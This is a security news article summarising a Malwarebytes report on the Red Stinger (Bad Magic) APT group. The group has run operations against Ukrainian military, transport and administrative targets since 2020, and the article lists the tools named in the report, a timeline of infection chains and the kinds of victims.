The Malwarebytes Threat Intelligence Team has disclosed an attack targeting Eastern Ukraine The security firm is tracking the threat actor with the internal codename, Red Stinger. In February, Kaspersky published details about the same actor with a different name, Bad Magic.
An undetected Red Stinger operation
The recent report by Malwarebytes found that these attacks are ongoing since 2020 and remained undetected until September 2022.
The attacks have targeted military, transportation, and critical infrastructure entities across Ukraine.
Kaspersky analyzed one of the attacks by Red Stinger in March that used the PowerMagic backdoor and CommonMagic framework. However, this was not the only attack performed by the group, and several other tools stayed hidden.
Recent findings revealed that the attacks involved different tools and malware such as DBoxShell, SolarTools, Ntinit, Ntuser, Ngrok, Rsockstun, ListFiles, SysInfo, ListVars, InstallNewPZZ, Ld_dll_loader, and StartRevSocks.
Attack timeline
The First Operation was performed in December 2020. The infection chain involved the use of an MSI file being downloaded from a URL and executing a VBS file that runs a .dll file.
The Second Operation (April 2021) used a zip file named RESOLUTION No 583-НС[.]zip. The method of propagation of this file remains unknown, however, the was Luhansk themed.
The experts have very little information regarding the Third Operation (September 2021). According to TTPs, they discovered overlapping techniques with both previous and subsequent operations.
In the Fourth Operation (February 2022), the group used a malicious MSI file that included a PDF, a VBS, and a data file. The .vbs file runs a .dat file that includes a small loader and a DBoxShell.
The Fifth Operation (March 2023), involves the use of malicious LNK leading to remotely hosted malicious MSI files downloaded and run by the Windows Installer executable.
Who are the victims?
In Operation Four, military personnel and an officer in central Ukraine were targeted.
In Operation Five, criminals targeted workers at Yasinovataya Administration and DPR administration.
There was an advisor from the Ukrainian Central Election Commission who experienced the attack.
Other victims were related to the transportation ministry or equivalent, along with a library in Vinnitsya.
Conclusion
The Red Stinger APT group, also known as Bad Magic, has been actively targeting Ukrainian military and transport organizations since 2020, using a plethora of malware to remain undetected. The group has successfully carried out multiple operations, making it difficult for organizations to detect and prevent their attacks. However, the provided IOCs about this campaign may help organizations stay protected from such groups.